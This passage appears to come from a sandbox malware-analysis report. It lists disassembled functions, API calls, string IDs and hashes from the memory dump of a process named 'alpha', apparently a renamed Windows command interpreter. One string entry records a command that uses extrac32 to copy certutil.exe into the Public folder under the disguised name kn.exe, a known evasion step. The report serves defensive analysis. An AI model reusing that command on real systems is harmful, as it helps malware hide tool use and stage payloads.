                                        • Opcode Fuzzy Hash: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                        • Instruction Fuzzy Hash: 2FD15C31B0C64386FA50BF62E8196B8B7A6AF54B64FC44035DF2D46299FE3CE6058730
                                        Function 00007FF7CD49081C Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 130COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: _wcsicmp$EnvironmentVariable
                                        • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                                        • API String ID: 198002717-267741548
                                        • Opcode ID: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                        • Instruction ID: 6ca712a830c395ee3d5a5c0f51ce80ae5eea51f084f41ef420910baae1bf8a45
                                        • Opcode Fuzzy Hash: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                        • Instruction Fuzzy Hash: 1B516E21B0CA4295FA10AF52A804579FBA6FF59BA1FC4A035DF2E03655FF3CE2048760
                                        Function 00007FF7CD48EF40 Relevance: 33.7, APIs: 16, Strings: 3, Instructions: 465COMMON
                                        Download Yara Rule
                                        APIs
                                        • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF7CD48E626,?,?,00000000,00007FF7CD491F69), ref: 00007FF7CD48F000
                                        • wcschr.MSVCRT(?,?,00000000,00007FF7CD491F69,?,?,?,?,?,?,?,00007FF7CD48286E,00000000,00000000,00000000,00000000), ref: 00007FF7CD48F031
                                        • iswdigit.MSVCRT(?,?,00000000,00007FF7CD491F69,?,?,?,?,?,?,?,00007FF7CD48286E,00000000,00000000,00000000,00000000), ref: 00007FF7CD48F0D6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: iswdigitiswspacewcschr
                                        • String ID: ()|&=,;"$=,;$Ungetting: '%s'
                                        • API String ID: 1595556998-2755026540
                                        • Opcode ID: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                        • Instruction ID: 354bc4e792c9bd447599a1b741d76254ca0fbab8bb13d3332a6ac1bb50190e28
                                        • Opcode Fuzzy Hash: 78b794f6fc69934632e6eee377604cec53d1945fb932c7168ee33591e32c1865
                                        • Instruction Fuzzy Hash: A0225565F0CA5291FA607F16A844279E6E1AF55BF1FC44132DFAD822A4FF3CA6418720
                                        Function 00007FF7CD48D3F0 Relevance: 31.8, APIs: 16, Strings: 2, Instructions: 310memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heap$Processwcschr$Alloc$Sizeiswspace
                                        • String ID: "$=,;
                                        • API String ID: 3545743878-4143597401
                                        • Opcode ID: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                        • Instruction ID: fc56d64ae50a44c2d5fa23fa607e00f73061c4a76622e66976d4501507533fb0
                                        • Opcode Fuzzy Hash: 41b55f4c43934df12ec69819f95cbaf5faa5e7209c82e771a15df21cb83dbe60
                                        • Instruction Fuzzy Hash: D9C19161F0EA5286EB656F119800379F6A1FF54FA4F889035CF6E42394FF3CA6458720
                                        Function 00007FF7CD4A5BF4 Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 153windowthreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: CurrentFormatMessageThread
                                        • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                        • API String ID: 2411632146-3173542853
                                        • Opcode ID: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                        • Instruction ID: 9cee8bed0fcadf0a480bb2c0b62fd0fbca3389f362eed05dbd3dd1c2668c5b71
                                        • Opcode Fuzzy Hash: fb2fb1c3bf230b004cc3ce09a0c69924bb125e2a6cca917ccdca682aa570422a
                                        • Instruction Fuzzy Hash: 18614661B0DA8291EA64EF91A5045B9F3A4FB54BA4FC4413ADF6D07758EF3CE7408B20
                                        Function 00007FF7CD4926E0 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 187fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: CreateFile_open_osfhandle
                                        • String ID: con
                                        • API String ID: 2905481843-4257191772
                                        • Opcode ID: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                        • Instruction ID: e45d3f9585955b137129732b92fec5b6c2eceea061c332b5446ba5eb126e827e
                                        • Opcode Fuzzy Hash: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
                                        • Instruction Fuzzy Hash: C671B432B0C6819AE720AF16E444A79FAA5FB89B70FD44234DF6D42794EF3CD6458B10
                                        Function 00007FF7CD4A93E8 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 168COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: ConsoleMode$Handle$wcsrchr$CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailureiswspacewcschr
                                        • String ID:
                                        • API String ID: 3829876242-3916222277
                                        • Opcode ID: a065431fe6af81354ef476bd10952e9750a3a50c047aab405a5f97467c5f577a
                                        • Instruction ID: 1e7b660d3dbc616b854d2d65d01054ca7051dbde0fe638e5f95fad3522282fcc
                                        • Opcode Fuzzy Hash: a065431fe6af81354ef476bd10952e9750a3a50c047aab405a5f97467c5f577a
                                        • Instruction Fuzzy Hash: 40617226B0CA4296E614AF52D41417AF7A1FF89B64FC89134DF5E07794EF3CEA058710
                                        Function 00007FF7CD4B1A40 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 148COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                        • String ID: CSVFS$NTFS$REFS
                                        • API String ID: 3510147486-2605508654
                                        • Opcode ID: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
                                        • Instruction ID: 1c22528e862d587adf3acb1f355e0125976161ad6b1ffcb9e14f0c77530023f2
                                        • Opcode Fuzzy Hash: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
                                        • Instruction Fuzzy Hash: A9613832708B829AEB619F61D8443E9B7A5FB5AB94F844036DF1E4B758EF38D604C710
                                        Function 00007FF7CD4872B0 Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 283COMMON
                                        Download Yara Rule
                                        APIs
                                        • longjmp.MSVCRT(?,00000000,00000000,00007FF7CD487279,?,?,?,?,?,00007FF7CD48BFA9), ref: 00007FF7CD4A4485
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: longjmp
                                        • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                        • API String ID: 1832741078-366822981
                                        • Opcode ID: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                        • Instruction ID: b6669f0f639bd16b9f4470d5b703d6d1191d4d1d6d9add8318ee690f68694a1c
                                        • Opcode Fuzzy Hash: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                        • Instruction Fuzzy Hash: B6C1D124F0C68281EA24FF9655906BCE791AB56BE4FD4003ACF2D97691EF2CE745C321
                                        Function 00007FF7CD48B998 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 275COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00007FF7CD48CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD48B9A1,?,?,?,?,00007FF7CD48D81A), ref: 00007FF7CD48CDA6
                                          • Part of subcall function 00007FF7CD48CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7CD48B9A1,?,?,?,?,00007FF7CD48D81A), ref: 00007FF7CD48CDBD
                                        • memset.MSVCRT ref: 00007FF7CD48BA2B
                                        • wcschr.MSVCRT ref: 00007FF7CD48BA8A
                                        • wcschr.MSVCRT ref: 00007FF7CD48BAAA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heapwcschr$AllocProcessmemset
                                        • String ID: -$:.\$=,;$=,;+/[] "
                                        • API String ID: 2872855111-969133440
                                        • Opcode ID: 7b3217b0480b3f12f234bd17b6b4b81bb5ac0aea220cc5327607834eba670ac4
                                        • Instruction ID: 40ead6ffab11eb7b031e22e9e56a2ec774a09762bc7c0de87b4ad7f822bc0596
                                        • Opcode Fuzzy Hash: 7b3217b0480b3f12f234bd17b6b4b81bb5ac0aea220cc5327607834eba670ac4
                                        • Instruction Fuzzy Hash: C1B1B421B0DA8285EA70AF55984427AA6A1FF44BE0FC54135CF7E83794EF3CE645C720
                                        Function 00007FF7CD48FC30 Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 311memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: longjmp$Heap$AllocByteCharMultiProcessWidememmovememset
                                        • String ID: 0123456789$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                        • API String ID: 1606811317-2340392073
                                        • Opcode ID: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                        • Instruction ID: dcfd9f8024bce1514ae232796501f5097e032946bcc1ae3888e412b6a9a3ca47
                                        • Opcode Fuzzy Hash: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                        • Instruction Fuzzy Hash: CAD16D21B0DA4281EA50AF15A8445B9B7A1FF857B0FC44132DF6E477A5EF3CE645C720
                                        Function 00007FF7CD4B03AC Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 219COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset$ErrorLast$InformationVolume
                                        • String ID: %04X-%04X$~
                                        • API String ID: 2748242238-2468825380
                                        • Opcode ID: 6140927c712726b5ce6b5c6052370d277af7610c6653376c5bf883b173b19ee6
                                        • Instruction ID: 14fa2c6366c8a8764555a05ede95c31b75337f28fcd03d372677530ed0aa5a8f
                                        • Opcode Fuzzy Hash: 6140927c712726b5ce6b5c6052370d277af7610c6653376c5bf883b173b19ee6
                                        • Instruction Fuzzy Hash: 71A1B12270CBC19AEB25AF6198402E9B7A5FB857A5F848134DF5D4BB88EF3CD7058710
                                        Function 00007FF7CD49662C Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 170COMMON
                                        Download Yara Rule
                                        APIs
                                        • wcschr.MSVCRT(?,?,?,?,?,?,?,00007FF7CD496570,?,?,?,?,?,?,00000000,00007FF7CD496488), ref: 00007FF7CD496677
                                        • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF7CD496570,?,?,?,?,?,?,00000000,00007FF7CD496488), ref: 00007FF7CD49668F
                                        • _errno.MSVCRT ref: 00007FF7CD4966A3
                                        • wcstol.MSVCRT ref: 00007FF7CD4966C4
                                        • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF7CD496570,?,?,?,?,?,?,00000000,00007FF7CD496488), ref: 00007FF7CD4966E4
                                        • iswalpha.MSVCRT(?,?,?,?,?,?,?,00007FF7CD496570,?,?,?,?,?,?,00000000,00007FF7CD496488), ref: 00007FF7CD4966FE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: iswdigit$_errnoiswalphawcschrwcstol
                                        • String ID: +-~!$APerformUnaryOperation: '%c'
                                        • API String ID: 2348642995-441775793
                                        • Opcode ID: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                        • Instruction ID: 74709389e48ee26bd2dc1a6278de5a0464d34172f47dfc48489da7e0b6f9f190
                                        • Opcode Fuzzy Hash: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                        • Instruction Fuzzy Hash: 0D718362A0CA4685EB606F22D41097DF7A6EB45B64F94C031EF6E02294FF3CE684C720
                                        Function 00007FF7CD489400 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 161COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset$ErrorInformationLastVolume_wcsicmptowupper
                                        • String ID: FAT$~
                                        • API String ID: 2238823677-1832570214
                                        • Opcode ID: 31d5b5f442e73b16389405a1f8f1aa1cf1f987a59b4b054618f08dfe6adbd7a2
                                        • Instruction ID: da0723e70dfad8aa1c754b2df9299d3122dbc3ef6b5181c8ca2fe4148b7238f2
                                        • Opcode Fuzzy Hash: 31d5b5f442e73b16389405a1f8f1aa1cf1f987a59b4b054618f08dfe6adbd7a2
                                        • Instruction Fuzzy Hash: 86718C3270CBC18AEB21AF2198446E9B7A5FB857A8F848035DF5D4BB58EF38D645C710
                                        Function 00007FF7CD48D840 Relevance: 18.4, APIs: 12, Instructions: 444memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000010,?,00000000,0000000E,00000025,00007FF7CD4C1A00,00007FF7CD48FE2A), ref: 00007FF7CD48D884
                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000010,?,00000000,0000000E,00000025,00007FF7CD4C1A00,00007FF7CD48FE2A), ref: 00007FF7CD48D89D
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000010,?,00000000,0000000E,00000025,00007FF7CD4C1A00,00007FF7CD48FE2A), ref: 00007FF7CD48D94D
                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000010,?,00000000,0000000E,00000025,00007FF7CD4C1A00,00007FF7CD48FE2A), ref: 00007FF7CD48D964
                                        • _wcsnicmp.MSVCRT ref: 00007FF7CD48DB89
                                        • wcstol.MSVCRT ref: 00007FF7CD48DBDF
                                        • wcstol.MSVCRT ref: 00007FF7CD48DC63
                                        • memmove.MSVCRT ref: 00007FF7CD48DD33
                                        • memmove.MSVCRT ref: 00007FF7CD48DE9A
                                        • longjmp.MSVCRT(?,?,?,?,?,?,?,?,00000000,00000010,?,00000000,0000000E,00000025,00007FF7CD4C1A00,00007FF7CD48FE2A), ref: 00007FF7CD48DF1F
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
